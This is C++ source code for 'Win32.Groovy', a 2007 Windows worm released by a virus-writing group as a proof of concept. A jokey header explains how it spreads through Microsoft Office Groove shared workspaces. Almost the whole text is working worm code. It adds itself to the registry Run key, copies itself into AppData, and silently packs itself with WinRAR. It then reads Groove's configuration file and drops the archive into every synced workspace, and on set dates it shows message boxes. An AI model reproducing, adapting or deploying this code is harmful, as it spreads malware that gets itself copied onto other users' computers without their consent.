/************************************************************* * Win32.Groovy (01/28/2007) * >>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>> * by free0n * vx13d.net | DoomRiderz www.doomriderz.com * ########################################################### * ++Groovy++ * Groovy is the first Microsoft Office Groove worm. Groove * is a new Microsoft Office Tool that lets users share documents * and workspaces with other team members. Now the best part * about Groove is it "Automatically sends the changes you make * in a workspace to your team members' computers." So naturally * this is now a new effective spreading technique that will * spread our worm for us and all we have to do is dump our file * into a workspace! omg how cool! * * Now there is some minor security on this tool so no .exe's but * we can do .zip's and .rar's so to fully exploit this little * loophole we make our worm have the ability to rar it'self! wow * hard stuff... the next little challenge is getting the * the workspaces and path to them on the hard drive but once again * Microsoft made this really easy by creating us an XML file! * so now we can just parse the xml file and get the all the * paths to copy our worm. Then once the worm is copied to the folder * almost instantly Microsoft Groove will alert all the members * of the workspace and download the worm to their computers. * Pretty cool right?! * * So let the fun begin on hacking this cool tool. This worm * is not violent with no destructive payloads and no real * defence against a.v. but since this is like a P.O.C. it * shouldn't matter. I'm not out to destroy the world anyways * just the only p.c. that matters (mine) hehe :) * >>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>> ************************************************************/ #include <cstdlib> #include <iostream> #include <windows.h> #include <string.h> #include <stdlib.h> #include <tlhelp32.h> #include <fstream> using namespace std; //the cooolest way to startup void AutoRun(string path) { HKEY hKey; RegCreateKey(HKEY_LOCAL_MACHINE, "SOFTWARE\Microsoft\Windows\CurrentVersion\Run", &hKey); RegSetValueEx(hKey, "Groovy", 0, REG_SZ, (BYTE *)path.c_str(), lstrlen(path.c_str())+1); RegCloseKey(hKey); } //winrar our file up basically //grabs the winrar path from the registry //then executes our rar parameters and //creates a archive for us. void WinRaR(string path) { HKEY hKey; HWND hwnd; string rarKey = "Software\Microsoft\Windows\CurrentVersion\App Paths\WinRAR.exe"; unsigned char rar[1024]; DWORD rarlen = sizeof(rar); char rarPath[MAX_PATH]; if(RegOpenKeyEx(HKEY_LOCAL_MACHINE,rarKey.c_str(),0,KEY_QUERY_VALUE,&hKey) == ERROR_SUCCESS) { //remember kids always close anything u open //it's like when u get married you have to make sure //u always put the lid down after goin tinkle //else youre wife will cut ur u know whats off RegQueryValueEx(hKey,"",0,NULL,rar,&rarlen); RegCloseKey(hKey); int i = 0; while(rar[i] != 0) { rarPath[i] = rar[i]; i++; } ShellExecute(hwnd,"open",rarPath,"a groovy.rar *.exe",NULL,SW_HIDE); //calling winrar like this is dumb but since we do it, we have //to give the program some time to execute and complete clock_t goal = 10000 + clock(); while (goal > clock()); } } //duh guess what these next two //functions do :) bool FileExists(string n) { ifstream groovy(n.c_str()); return groovy.is_open(); } string ReplaceAll(string s, string f, string r) { unsigned int found = s.find(f); while(found != string::npos) { s.replace(found, f.length(), r); found = s.find(f); } return s; } char *AppDataDir() { //hack our shell folders and grab our application data path //never do that lame hard coding drive shit that's dumb. HKEY hKey; char *appKey = ".DEFAULT\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders"; unsigned char appData[1024]; DWORD appLen = sizeof(appData); char appPath[MAX_PATH]; if(RegOpenKeyEx(HKEY_USERS,appKey,0,KEY_QUERY_VALUE,&hKey) == ERROR_SUCCESS) { RegQueryValueEx(hKey,"Local AppData",0,NULL,appData,&appLen); RegCloseKey(hKey); int i = 0; while(appData[i] != 1) { appPath[i]=appData[i]; i++; } } return appPath; } //holy mother of god! //string manipulation is horrible in C/C++ //and the fact i'm not good at it doesn't help //but it works.... //basically opens our passed in xml file //string tokens based on " " then we save //all the lines that have RootFolderPath into another //string. then we use that replace all method //to replace those 2 strings and that gives us //our filepaths with a delimiter of a double quote " string ParsePaths(string path) { string line; ifstream grooveyFile (path.c_str()); char findchar = '_'; string paths = ""; if(grooveyFile.is_open()) { while(!grooveyFile.eof()) { getline(grooveyFile,line); if(line.length() > 0 || line != "") { int i = 0; char str[line.length()]; while(line.length() != i) { str[i] = line[i]; i++; } char* rfp; rfp = strtok(str," "); while (rfp != NULL) { if(strstr(rfp,"RootFolderPath=")) paths += rfp; rfp = strtok (NULL, " "); } } } grooveyFile.close(); if(paths.length() > 0 || paths != "") { //this will give us our paths in one string //we will leave a double quote " there to use //as our maker then later will just use strtok to //grab the paths. easy cheezy :) paths = ReplaceAll(paths,"_OrigRootFolderPath="",""); paths = ReplaceAll(paths,"_RootFolderPath="",""); } } return paths; } //we pass in our rar file and our filepaths string //that was returned from the method above this one //looks like this C:fasm"C:test"C:blah" since //our double quote is our delimiter we can use strtok //again to get the paths to copy from one by one. void Spread(string file, string filepaths) { int i = 0; char str[filepaths.length()]; while(filepaths.length() != i) { str[i] = filepaths[i]; i++; } char* fxs; fxs = strtok(str,"""); while (fxs != NULL) { if(strstr(fxs,"\")) { string p = ""; p += fxs; char* l = strrchr(fxs,'\'); if(strlen(fxs) == (l-fxs+1)) { p += file; CopyFile(file.c_str(),p.c_str(),TRUE); } } fxs = strtok(NULL, """); } } void Payload() { SYSTEMTIME time; GetSystemTime(&time); //happy 420! i did this for all the people that //go to hippy hill in San Francisco, hopefully //you'll be there and not get this message //but if you do, then just go to the park and groove //out to some greatful dead and pass some joints :) //I remember how much fun it was to be out there and i miss it sooo bad :) //great people and great fun! do it if you ever get a chance if(time.wDay == 20 && time.wMonth == 4) { MessageBox(NULL,"Infected with the first Groove worm. Don't worry nothin bad happend. Isn't it just groooovy! :)","Grooovy by free0n [DoomRiderz]",MB_OK); } if(time.wDay == 16 && time.wMonth == 9) { //A sPecial Secret Message for Someone on this Day MessageBox(NULL,"Help sAve PeoPle other than Yourself - Burn Down the Angelic evils that haunt You","Grooovy by free0n [DoomRiderz]",MB_OK); } } //main program execution //works like this //1. gets our path //2. gets our xml path that stores all the groove repositories // the groove repositories will be our destination folders for copying our worm //3. if xml file exists then get repositories and continue //4. Create a directory and dump a copy of ourself in it //5. Add the copy to the auto startup //6. If WinRaR is on the system then RaR up the directory with our .exe and continue //7. Check to see if we got any repository paths, if we do then copy our rar file to // those paths and continue //8. Delete our rar file cause that would have been created in our main app directory //9. Then run our msgbox payload int WINAPI WinMain (HINSTANCE hThisInstance, HINSTANCE hPrevInstance, LPSTR lpszArgument, int nFunsterStil) { char me[MAX_PATH]; GetModuleFileName(0,me,sizeof(me)); if(FileExists("groovy.rar")) { DeleteFile("groovy.rar"); } string groovey = strcat(AppDataDir(),"\Groovy"); CreateDirectory(groovey.c_str(),NULL); groovey += "\groovy.exe"; AutoRun(groovey); CopyFile(me,groovey.c_str(),TRUE); WinRaR(strcat(AppDataDir(),"\Groovy\")); if(FileExists("groovy.rar")) { //spread using ms office groove string path = strcat(AppDataDir(),"\Microsoft\Office\Groove\User\GFSConfig.xml"); string groovePaths = ParsePaths(path); if(groovePaths.length() > 0) { if(FileExists("groovy.rar")) { Spread("groovy.rar", groovePaths); DeleteFile("groovy.rar"); Payload(); } } } return 0; }